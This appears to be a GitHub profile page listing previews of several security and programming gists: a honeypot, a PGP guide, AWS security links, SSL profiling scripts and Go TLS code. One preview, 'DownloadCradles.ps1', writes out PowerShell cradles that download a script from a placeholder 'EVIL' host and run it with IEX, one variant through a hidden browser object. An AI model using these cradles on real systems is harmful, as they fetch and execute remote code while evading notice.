Skip to content

Instantly share code, notes, and snippets.

View 0x4D31's full-sized avatar

Adel Karimi 0x4D31

936 followers · 102 following
View GitHub Profile
@omnidan
omnidan / honeypot.py
Created December 10, 2011 22:09
HONEYPOT.PY | A simple honeypot written in python.
#!/usr/bin/env python
"""
Copyright (c) 2011, Daniel Bugl
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright
@JeffPaine
JeffPaine / beautiful_idiomatic_python.md
Last active January 14, 2023 05:37
Moved to: https://github.com/JeffPaine/beautiful_idiomatic_python

Moved

Now located at https://github.com/JeffPaine/beautiful_idiomatic_python.

Why it was moved

Github gists don't support Pull Requests or any notifications, which made it impossible for me to maintain this (surprisingly popular) gist with fixes, respond to comments and so on. In the interest of maintaining the quality of this resource for others, I've moved it to a proper repo. Cheers!

@grugq
grugq / gist:03167bed45e774551155
Last active April 6, 2024 10:12
operational pgp - draft

Operational PGP

This is a guide on how to email securely.

There are many guides on how to install and use PGP to encrypt email. This is not one of them. This is a guide on secure communication using email with PGP encryption. If you are not familiar with PGP, please read another guide first. If you are comfortable using PGP to encrypt and decrypt emails, this guide will raise your security to the next level.

@chanj
chanj / AWS Security Resources
Last active June 21, 2021 09:49
AWS Security Resources
INTRO
I get asked regularly for good resources on AWS security. This gist collects some of these resources (docs, blogs, talks, open source tools, etc.). Feel free to suggest and contribute.
Short Link: http://tiny.cc/awssecurity
Official AWS Security Resources
* Security Blog - http://blogs.aws.amazon.com/security/
* Security Advisories - http://aws.amazon.com/security/security-bulletins/
* Security Whitepaper (AWS Security Processes/Practices) - http://media.amazonwebservices.com/pdf/AWS_Security_Whitepaper.pdf
* Security Best Practices Whitepaper - http://media.amazonwebservices.com/AWS_Security_Best_Practices.pdf
@honkskillet
honkskillet / byte-sizetuts.md
Last active June 18, 2022 14:18
A series of golang tutorials with youtube videos.
@n0531m
n0531m / list_gcp_iprange.sh
Last active April 17, 2024 21:50
Google Cloud Platform : ip address range
#!/bin/bash
# https://cloud.google.com/compute/docs/faq#find_ip_range
# nslookup -q=TXT _cloud-netblocks.googleusercontent.com 8.8.8.8
myarray=()
for LINE in `dig txt _cloud-netblocks.googleusercontent.com +short | tr " " "\n" | grep include | cut -f 2 -d :`
do
myarray+=($LINE)
for LINE2 in `dig txt $LINE +short | tr " " "\n" | grep include | cut -f 2 -d :`
@wxsBSD
wxsBSD / gist:6d5e777afc31b3cf46d0
Last active July 14, 2018 16:56
Inferring contents of SSL sessions

Disclaimer

Everything I'm talking about below is not new, but I thought it was an interesting idea and realized I already had the majority of pieces in place to play with it. I want to share what I learned. If you are at all interested in exploring this topic further a good paper on it is here. Also, a few years ago IOActive published a blog post on the technique which is also a good read. Finally, the last two paragraphs in section 6 of RFC5246 clearly document the problem the best I've been able to find:

Any protocol designed for use over TLS must be carefully designed to
deal with all possible attacks against it.  As a practical matter,
this means that the protocol designer must be aware of what security
properties TLS does and does not provide and cannot safely rely on
the latter.
@wxsBSD
wxsBSD / ssl-profiling-local.bro
Last active April 3, 2020 01:21

SSL Profiling in Bro

I wrote profiling applications over SSL recently and this is my attempt at doing so in Bro. I haven't written a Bro script before this one so I'm betting I've got a bunch of things wrong here. The code comes in two parts. The first is the main script which has the core logic. The second part is the "local" script which defines the application profiles you are interested in.

The Main Script

@load base/protocols/conn
@load base/protocols/ssl
@load base/frameworks/notice
@HarmJ0y
HarmJ0y / DownloadCradles.ps1
Last active May 24, 2024 06:54
Download Cradles
# normal download cradle
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")
# PowerShell 3.0+
IEX (iwr 'http://EVIL/evil.ps1')
# hidden IE com object
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r
# Msxml2.XMLHTTP COM object
@husobee
husobee / client_tls_info.go
Last active December 14, 2020 17:52
discovery of tls in go, and the handshake process
package main
import (
"crypto/tls"
"encoding/json"
"fmt"
"log"
"net"
"net/http"
)